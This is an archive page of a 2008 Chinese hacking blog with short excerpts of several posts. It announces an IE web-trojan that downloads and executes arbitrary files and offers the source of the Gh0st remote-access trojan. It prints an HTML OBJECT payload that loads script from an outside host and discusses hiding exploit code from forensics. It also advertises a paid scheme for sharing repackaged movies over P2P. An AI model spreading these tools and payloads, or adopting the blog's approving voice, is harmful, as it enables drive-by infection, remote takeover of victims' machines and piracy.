2008年5月 的日志

IE0DAY网马

2008/05/24 20:50 | 鬼仔 | 工具收集 | 5 个回复

鬼仔注:这个漏洞

这个漏洞参考http://www.milw0rm.com/exploits/5619

Author: Greysign
2008-5-24
http://www.scanw.com/blog

哈哈。标题吸引吗。
修改代码请注意不能使用双引号”,注意不能跨域,还有一些其他零碎的问题自己调试吧。
这个漏洞执行后可以远程下载任意文件并执行。
第一次写网马,只好拿鸡PP搓成鸡胸,这样垃圾的漏洞才能放出来~哈哈。
阅读全文 »

Tags:

Gh0st RAT Beta 3.6开源

2008/05/24 2:47 | 鬼仔 | 工具收集 | 8 个回复

鬼仔注:Gh0st从2.5之后就不开源了,现在3.6又开了。

下载地址:gh0st3.6_src.rar

再来一个长长的更新列表:
阅读全文 »

Tags: ,

对MS word javascript execution的一些测试

2008/05/23 23:43 | 鬼仔 | 技术文章 | 消灭0回复

作者:余弦
来源:0×37 Security

Microsoft word javascript execution原文:http://marc.info/?l=bugtraq&m=121121432823704&w=2,hi群内讨论过。可以得出一些结论:

1、由于安装Q313675 安全修补程序后禁用ActiveX 内联数据流功能,使得利用JS直接创建ActiveX对象而执行恶意codz的方法不可行。如下code:

<html>
<OBJECT classid=clsid:AE24FDAE-03C6-11D1-8B76-0080C744F389><param name=url value="javascript:document.write('&lt;script src=http://www.0x37.com/doc.js&gt;&lt;/script&gt;')"></OBJECT>

这个远程的doc.js文件能力有限。但是弹出对话框或一个新窗口还是可以的。
阅读全文 »

Tags: , ,

朋友做的一个网赚联盟–派克视频推广平台

2008/05/23 23:22 | 鬼仔 | 乱七八糟 | 2 个回复

鬼仔注:帮朋友打个广告,希望大家不要介意。 :)

派克视频推广平台:http://www.packp2p.com/

第一步,打开http://www.packp2p.com 派克传媒广告网站,注册一个账号!
第二步,下载一个视频加密打包工具,处理我们喜欢看的电影,目前支持的格式wmv,asf,wma,wms等格式!
第三步,然后通过你们常用的电驴,青苹果,P8,BT等这些工具将处理好后的文件共享给互联网就好了,每1000个IP播放后,账户内将有10元人民币回报,如账户内资金达到8元后,就可以申请划账至支付宝,银行账号,也可以要求站长用Q币支付,等!

如果不懂的,可以下载动画观看
下载地址:http://down.packp2p.com/donghua.zip

Tags: ,

网马躯干

2008/05/23 23:12 | 鬼仔 | 工具收集 | 消灭0回复

鬼仔注:网马中枢

Author: Greysign
2008-5-23
http://www.scanw.com/blog

余弦不久之前写了网马中枢,是关于服务端应用的一小角,他还说有其他更复杂的应用,一直等着他的BLOG更新,还是未见他写出来。最近大家都很忙。

关于网马代码,exploit固然重要,但除了exploit之外的网马框架加强对于网马功能扩展也是必然的发展趋势。网马中枢里面用了include ,读取文件等方式来隐藏EXP的地址,不过,EXP代码完全暴露出来了,那就无法阻止代码被剽窃,被取证等行为。
阅读全文 »

Tags:

CSRF: 不要低估了我的危害和攻击能力

2008/05/23 15:31 | 鬼仔 | 技术文章 | 7 个回复

作者:iceskysl
来源:IceskYsl@1sters!

CSRF这种攻击方式虽然提出来很久(在2006年的时候就有了)了,但是这个沉睡的攻击巨人直到前不久才逐渐走入我们的视线,到底CSRF是啥,危害到底有多大?常见的利用方式是如何的,今天作为“安全相关 | Security”分类的第一篇文章,我按照自己的理解告诉你,不要低估了CSRF危害性和攻击能力。

一、什么是CSRF
先看看CSRF的原文说明,如下:

Cross Site Reference Forgery works by including malicious code or a link in a page that accesses a web application that the user is believed to have authenticated. If the session for that web application has not timed out, an attacker may execute unauthorized commands.

阅读全文 »

Tags: , ,

首页巡警v1.1/1.0 内核驱动 拒绝服务 及 本地提权漏洞

2008/05/22 23:29 | 鬼仔 | 技术文章 | 1 个回复

作者:MJ0011
来源:MJ0011的内核驱动研究所

首页巡警v1.1/1.0的内核驱动程序存在严重漏洞

安装了首页巡警v1.1(v1.0)的机器,任意权限的用户可导致系统蓝屏(BSOD),造成拒绝服务攻击

结合我之前公布的SystemCrashDumpInformation加载驱动方式,可以在安装了HIPS的机器上造成本地提权漏洞,即任意权限的用户可以加载驱动到内核并执行。
阅读全文 »

Tags: ,

哀悼与团结的曲线

2008/05/22 23:22 | 鬼仔 | 乱七八糟 | 1 个回复

来源:Google 黑板报

汶川大地震——这场三十年来降临在华夏大地上最大的一次灾难,令整个中国陷入巨大的震惊与无比的悲痛之中。仅仅在几天之前,”地震”仿佛还是一个与你我无关的字眼,”汶川”也不过是厚厚的地图集中一个无人知晓的偏僻的所在。而在今天,一切都改变了。

当我们依照惯例整理和分析谷歌搜索引擎的流量数据时,一条从未见过的曲线出现在我们面前。当意识到发生了什么事情时,我们的眼睛湿润了。
阅读全文 »

Tags: